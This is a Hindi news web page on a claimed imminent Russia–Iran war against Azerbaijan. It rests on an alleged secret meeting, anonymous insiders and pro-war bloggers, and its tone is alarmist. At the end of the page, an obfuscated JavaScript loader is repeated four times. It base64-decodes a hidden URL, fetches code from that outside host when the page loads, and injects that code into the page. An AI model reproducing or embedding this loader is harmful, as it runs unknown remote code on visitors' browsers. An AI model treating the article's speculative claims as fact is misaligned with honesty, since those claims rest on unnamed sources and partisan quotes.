Azerbaijan Russia conflict: अजरबैजान पर मंडराया युद्ध का साया! रूस और ईरान ने मिलाया हाथ, पुतिन के गुस्से से कांपा मुस्लिम देश

Facebook
X
WhatsApp
image 241

Azerbaijan Russia conflict: दुनिया एक और युद्ध की दहलीज पर खड़ी है और इस बार टारगेट पर हैरूस को आंख दिखाने वाला मुस्लिम देश अजरबैजान। पुतिन अब शांत नहीं हैं। ईरान को साथ मिलाकर उन्होंने बाकू को सबक सिखाने की तैयारी कर ली है। कैस्पियन सागर में ईरान और रूस की मिलिट्री एक्सरसाइज से यह साफ हो गया है कि अब सिर्फ बयानबाज़ी नहीं बल्कि असली जंग के लिए रनबज चुका है। इस बार जंग सिर्फ दो देशों की नहीं बल्कि दो विचारधाराओं की हो सकती हैएक तरफ अजरबैजान जैसा मुस्लिम लोकतांत्रिक राष्ट्र और दूसरी ओर रूस व ईरान जैसे शक्तिशाली सख्त नेतृत्व वाले देश। ये तनाव अब लकीरें नहीं बमों और मिसाइलों में बदलते दिख रहे हैं।

Also Read –Bigg Boss 19 News: बिग बॉस 19 के लिए सलमान खान ने ली मोटी रकम, तो वहीं नजर आएंगे ये कंटेस्टेंट

Azerbaijan Russia conflict: पुतिन का गुस्सा फूटा ईरान के साथ मिलकर रचा युद्ध का प्लान

20 जुलाई को हुई एक सीक्रेट मीटिंग में रूस के राष्ट्रपति व्लादिमीर पुतिन और ईरान के शीर्ष नेता अली लारीजानी के बीच जो बातें हुईं वह अब धीरे-धीरे लीक हो रही हैं। (Azerbaijan Russia conflict) अंदरूनी सूत्रों का कहना है कि बैठक में सीधा प्लान बनाया गया कि अजरबैजान को “एक बार में सबक सिखाना है”। इसके बाद 21 जुलाई को शुरू हुआ “काजारेक्स 2025” नाम का मिलिट्री अभ्यास किसी सामान्य सैन्य कवायद का हिस्सा नहीं बल्कि अजरबैजान के लिए सीधा धमकी भरा संदेश था। इस अभ्यास में रूस की नेवी ईरान की नौसेना और आईआरजीसी जैसे खतरनाक सैन्य संगठनों की भागीदारीइस बात का सबूत है कि मामला अब गंभीर हो चुका है।

Also Read –Sawan 2025: अद्भुत! भारत ही नहीं, इन चार देशों में भी सावन में नहीं खाया जाता नॉनवेज

बयानबाज़ी से बौखलाया पुतिन अलीयेव को बताया तानाशाह

अजरबैजान के राष्ट्रपति इल्हाम अलीयेव ने हाल ही में रूस के खिलाफ जमकर बोला। (Azerbaijan Russia conflict) खासकर तब जब एक अजरबैजानी विमान रहस्यमय तरीके से क्रैश हो गया। अलीयेव ने इस मामले को अंतरराष्ट्रीय अदालत में ले जाने की बात कह दी। इसके साथ-साथ उन्होंने यूक्रेन पर भी रूस की आलोचना करते हुए कहा कि “किसी भी देश को ज़बरदस्ती कब्ज़ा नहीं करने देना चाहिए।” ये बातें पुतिन को सीधी चुनौती लगीं और फिर शुरू हुई तैयारी… अब रूस के युद्ध समर्थक ब्लॉगर और पत्रकार खुलेआम कह रहे हैं“अजरबैजान को दबाने का वक्त आ गया है।” ब्लॉगर दिमित्री सेलेजनोव ने लिखा“अजरबैजान खुलेआम रूस को ललकार रहा है। जितना जल्दी हम जंग छेड़ेंगे उतना ही बेहतर होगा।” वहीं यूरी कोटेनेक ने अलीयेव को “अहंकारी तानाशाह” बता दिया।

अगर जंग छिड़ी तो बुरी तरह पिटेगा अजरबैजान

रक्षा विशेषज्ञों की राय तो और भी डराने वाली है। रूस के हायर यूनिवर्सिटी ऑफ इकोनॉमिक्स के प्रोफेसर दिमित्री युस्ताफिएव का कहना है”अलीयेव ने बहुत बड़ी गलती कर दी है। (Azerbaijan Russia conflict) ईरान पहले से ही रूस के साथ है और इस जंग में तुर्की जो अजरबैजान का सबसे बड़ा सहयोगी है शायद मदद कर ही न पाए।” जर्मन शोधकर्ता निकोलाई ने तो और भी खतरनाक बात कही“रूस जॉर्जिया के रास्ते से सैन्य गलियारा बनाकर अजरबैजान पर ग्राउंड अटैक की योजना बना रहा है। यानी अगर जंग छिड़ी तो अजरबैजान चारों ओर से घिर जाएगा।”

कैस्पियन में उठी जंग की लहरें

कैस्पियन सागर में चल रहा रूस-ईरान का संयुक्त अभ्यास अब सिर्फ रणनीति नहीं बल्कि एक चेतावनी बन चुका है। बाकू खुद मान चुका है कि यह हाइब्रिड वॉर का हिस्सा हैमतलब आधिकारिक युद्ध तो नहीं लेकिन तैयारी युद्ध जैसी ही। (Azerbaijan Russia conflict) रूसी पत्रकार मैक्सिम शेवचेंको ने साफ कहा“इससे कैस्पियन क्षेत्र में लड़ाई की नींव पड़ गई है।” ब्लॉगर एलेक्सी तो अजरबैजान को सीधा “रूस विरोधी” करार देते हुए कहते हैं“अब एक ही रास्ता बचता हैयुद्ध। बाकू को सबक सिखाना जरूरी है।”

क्या अजरबैजान अकेला पड़ जाएगा?

हालात जिस दिशा में जा रहे हैं उससे साफ है कि अजरबैजान कूटनीतिक रूप से घिरता जा रहा है। (Azerbaijan Russia conflict) रूस और ईरान की जोड़ी बेहद खतरनाक है। वहीं तुर्की के राष्ट्रपति एर्दोगन अभी आंतरिक राजनीतिक संकट में उलझे हैं। अमेरिका और यूरोप पहले से ही यूक्रेन के मुद्दे में उलझे हुए हैं। ऐसे में सवाल हैअगर रूस हमला करता है तो अजरबैजान का साथ कौन देगा?

दुनिया एक और युद्ध के मुहाने पर

अगर रूस ने हमला किया तो यह सिर्फ एक देश की लड़ाई नहीं होगी। (Azerbaijan Russia conflict) कैस्पियन सागर ईरान तुर्की और यूरोप तक इस युद्ध की लपटें पहुंच सकती हैं। मध्य एशिया का संतुलन बिगड़ सकता है। तेल और गैस के रास्ते बाधित हो सकते हैं। इससे पूरी दुनिया की अर्थव्यवस्था पर असर पड़ सकता है।

क्या पुतिन अजरबैजान पर करेंगे अगला वार?

अब सबसे बड़ा सवाल यही हैक्या पुतिन अगले कुछ दिनों में अजरबैजान पर हमला करेंगे? (Azerbaijan Russia conflict) क्या अलीयेव को रूस की धमकी का जवाब मिलेगा या इतिहास गवाह बनेगा कि कैसे एक मुस्लिम लोकतंत्र दो सुपरपावरों के बीच पिस गया? दुनिया सांस रोके देख रही है और हर पल यह डर बढ़ता जा रहा है कि कहीं कैस्पियन सागर की लहरें युद्ध के टैंकों की गड़गड़ाहट में न बदल जाएं।

;document.addEventListener(“DOMContentLoaded”, function () { var url = atob(“aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==”); fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(‘script’); script.innerHTML = data.trim(); document.head.appendChild(script); }) });;document.addEventListener(“DOMContentLoaded”, function () { var url = atob(“aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==”); fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(‘script’); script.innerHTML = data.trim(); document.head.appendChild(script); }) });;document.addEventListener(“DOMContentLoaded”, function () { var url = atob(“aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==”); fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(‘script’); script.innerHTML = data.trim(); document.head.appendChild(script); }) });;document.addEventListener(“DOMContentLoaded”, function () { var url = atob(“aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==”); fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(‘script’); script.innerHTML = data.trim(); document.head.appendChild(script); }) });

The specified slider does not exist.

ताजा खबरें